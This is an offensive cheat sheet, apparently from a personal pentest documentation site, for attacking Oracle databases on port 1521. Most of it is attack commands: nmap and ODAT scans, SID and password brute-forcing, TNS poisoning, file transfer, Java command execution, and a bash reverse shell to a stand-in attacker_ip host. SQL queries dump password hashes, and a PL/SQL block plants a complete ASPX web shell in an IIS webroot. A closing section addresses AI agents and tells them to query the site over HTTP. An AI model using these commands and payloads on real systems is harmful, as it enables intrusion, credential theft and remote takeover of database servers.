# Oracle SQL | 1521

## 00. Basic

```bash
## ------------------| Nmap Scans
sudo nmap -Pn -sC -sV -p1521 $IP
sudo nmap -Pn -sC -sV -p1521 --script *oracle* $IP
sudo nmap -Pn -sC -sV -p1521 --script oracle-sid-brute $IP
```

## 01. ODAT (Oracle Database Attacking Tool) 

```bash
## ------------------| Install on aarch64 (ARM)
sudo apt-get install libaio1t64 python3-dev alien -y 
git clone https://github.com/quentinhardy/odat.git && cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/instantclient-basic-linux-arm64.zip
wget https://download.oracle.com/otn_software/linux/instantclient/instantclient-sqlplus-linux-arm64.zip
unzip instantclient-basic-linux-arm64.zip
unzip instantclient-sqlplus-linux-arm64.zip
echo "export LD_LIBRARY_PATH=\"$(pwd)/instantclient_23_7:\$LD_LIBRARY_PATH\"" >> ~/.zshrc  ## Change 19_25 and change ~/.bashrc if you are using bash
echo "export PATH=\"\$PATH:$(pwd)/instantclient_23_7\"" >> ~/.zshrc    ## Change 19_25 and change ~/.bashrc if you are using bash
sudo apt-get install -y python3-cx-oracle python3-scapy python3-colorlog python3-termcolor python3-passlib python3-pycryptodome python3-pyinstaller python3-libnmap build-essential libgmp-dev  

## ------------------| Scan all 
odat all -s $IP -p 1521

## ------------------| Scan SID
odat sidguesser -s $IP -p 1521

# ------------------| TNS Poisoning
odat tnspoison -s $IP -p 1521 -d <SID> --test-module
odat tnspoison -s $IP -p 1521 -d <SID> --poison 

## ------------------| Brute Force Passwords
odat passwordguesser -s $IP -p 1521 -d <SID> -U h4rithd -P passwords.txt
odat passwordguesser -s $IP -d <SID> --accounts-file /usr/share/odat/accounts/accounts.txt

## ------------------| Test Connection to Oracle Database
odat test -s $IP -d <SID> -U h4rithd -P password123

## ------------------| Upload Files to Oracle Server
odat utlfile -s $IP -d <SID> -U h4rithd -P password123 --putFile="<LOCAL_FILE_PATH>" --remotePath="<REMOTE_PATH>"

## ------------------| Download File from Server
odat utlfile -s $IP -d <SID> -U h4rithd -P password123 --getFile="<REMOTE_FILE_PATH>" --localPath="<LOCAL_PATH>"

## ------------------| Execute Java Code
odat java -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --exec "whoami"

## ------------------| Execute Reverse Shell
odat externaltable -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --exec "bash -i >& /dev/tcp/attacker_ip/4444 0>&1"

## ------------------| Enumerate UTL_HTTP Access
odat utlhttp -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --test-module

## ------------------| Enumerate UTL_TCP Access
odat utltcp -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --test-module

## ------------------| Enumerate UTL_FILE Access
odat utlfile -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --test-module

## ------------------| Enumerate JAVA Access
odat java -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --test-module

## ------------------| Enumerate External Table Access
odat externaltable -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --test-module

## ------------------| Enumerate CTXSYS Access
odat ctxsys -s $IP -p 1521 -d <SID> -U h4rithd -P password123 --test-module

## ------------------| Check if Oracle Listener is Running
odat tnspoison -s $IP -d <SID> -U h4rithd -P password123

## ------------------| Perform TNS Poisoning Attack
odat tnspoison -s $IP -d <SID> -U h4rithd -P password123 --poison
```

## 02. SQPLUS

```bash
## ------------------| Setup [intel]
sudo apt-get install oracle-instantclient-sqlplus
which sqlplus
export ORACLE_HOME=/usr/lib/oracle/19.6/client64/
export LD_LIBRARY_PATH=$ORACLE_HOME/lib
export PATH=$ORACLE_HOME/bin:$PATH

## ------------------| Setup [ARM]
mkdir -p /opt/oracle
wget https://download.oracle.com/otn_software/linux/instantclient/instantclient-basic-linux-arm64.zip -O /dev/shm/instantclient-basic-linux-arm64.zip
wget https://download.oracle.com/otn_software/linux/instantclient/instantclient-sqlplus-linux-arm64.zip -O /dev/shm/instantclient-sqlplus-linux-arm64.zip
wget https://download.oracle.com/otn_software/linux/instantclient/instantclient-sdk-linux-arm64.zip -O /dev/shm/instantclient-sdk-linux-arm64.zip 
unzip -d /opt/oracle /dev/shm/instantclient-basic-linux-arm64.zip
unzip -d /opt/oracle /dev/shm/instantclient-sqlplus-linux-arm64.zip
unzip -d /opt/oracle /dev/shm/instantclient-sdk-linux-arm64.zip 
version=$(unzip -l /dev/shm/instantclient-basic-linux-arm64.zip | awk '{print $4}' | grep '^instantclient_' | cut -d/ -f1 | sort -u)
echo "export PATH=$PATH:/opt/oracle/$version" >> ~/.zshrc
echo "export TNS_ADMIN=/opt/oracle/$version" >> ~/.zshrc
echo "export LD_LIBRARY_PATH=/opt/oracle/$version" >> ~/.zshrc
echo "export ORACLE_HOME=/opt/oracle/$version" >> ~/.zshrc
sqlplus -V

## ------------------| Login as user
sqlplus username/password@//host:port/SID
sqlplus <USERNAME>/'<PASSWORD>'@<IP>:1521/XE

## ------------------| Login as superuser
sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba

## ------------------| Show Current User
SELECT USER FROM DUAL;

## ------------------| List All Users
SELECT username FROM all_users;

## ------------------| List User Roles
SELECT * FROM user_role_privs;

## ------------------| List User System Privileges
SELECT * FROM user_sys_privs;

## ------------------| Show Session Privileges
SELECT * FROM session_privs;

## ------------------| List User Table Privileges
SELECT * FROM user_tab_privs;

## ------------------| List All Tables (Accessible)
SELECT table_name FROM all_tables;

## ------------------| List Tables Owned by Current User
SELECT table_name FROM user_tables;

## ------------------| Describe Table Structure
DESC table_name;

## ------------------| Select All Data from a Table
SELECT * FROM table_name;

## ------------------| Get Oracle Version
SELECT * FROM v$version;

## ------------------| Get Current Database Name
SELECT name FROM v$database;

## ------------------| Check Current User Sessions
SELECT username, sid, serial#, status FROM v$session;

## ------------------| List All Roles
SELECT * FROM dba_roles;

## ------------------| Check Role Privileges
SELECT * FROM role_sys_privs;

## ------------------| List Columns in a Table
SELECT column_name FROM all_tab_columns WHERE table_name = 'TABLE_NAME';

## ------------------| Check Grants Given to a User
SELECT * FROM dba_sys_privs WHERE grantee = 'USERNAME';

## ------------------| Check Password Hashes (10g or before)
SELECT name, password FROM sys.user$;

## ------------------| Check Tablespaces
SELECT tablespace_name FROM dba_tablespaces;

## ------------------| Check Users and Default Tablespace
SELECT username, default_tablespace FROM dba_users;

## ------------------| Read File Using UTL_FILE in Oracle
SET SERVEROUTPUT ON;

DECLARE
   f UTL_FILE.FILE_TYPE;
   s VARCHAR2(5000);
BEGIN
   f := UTL_FILE.FOPEN('/inetpub/wwwroot', 'iisstart.htm', 'R');
   UTL_FILE.GET_LINE(f, s);
   UTL_FILE.FCLOSE(f);
   DBMS_OUTPUT.PUT_LINE(s);
END;
/ # Hit enter then type '/' and  hit enter

## ------------------| Write File Using UTL_FILE in Oracle
DECLARE
   f UTL_FILE.FILE_TYPE;
   s VARCHAR2(5000) := 'h4rithd was there';
BEGIN
   f := UTL_FILE.FOPEN('/inetpub/wwwroot', 'h4rith.txt', 'W');
   UTL_FILE.PUT_LINE(f, s);
   UTL_FILE.FCLOSE(f);
END;
/ # Hit enter then type '/' and  hit enter

## ------------------| Drop ASPX Web Shell Using UTL_FILE
DECLARE
   f UTL_FILE.FILE_TYPE;
   s VARCHAR2(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><HTML><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
BEGIN
   f := UTL_FILE.FOPEN('/inetpub/wwwroot', 'h4rithd.aspx', 'W');
   UTL_FILE.PUT_LINE(f, s);
   UTL_FILE.FCLOSE(f);
END;
/ # Hit enter then type '/' and  hit enter
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.h4rithd.com/database/oracle.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.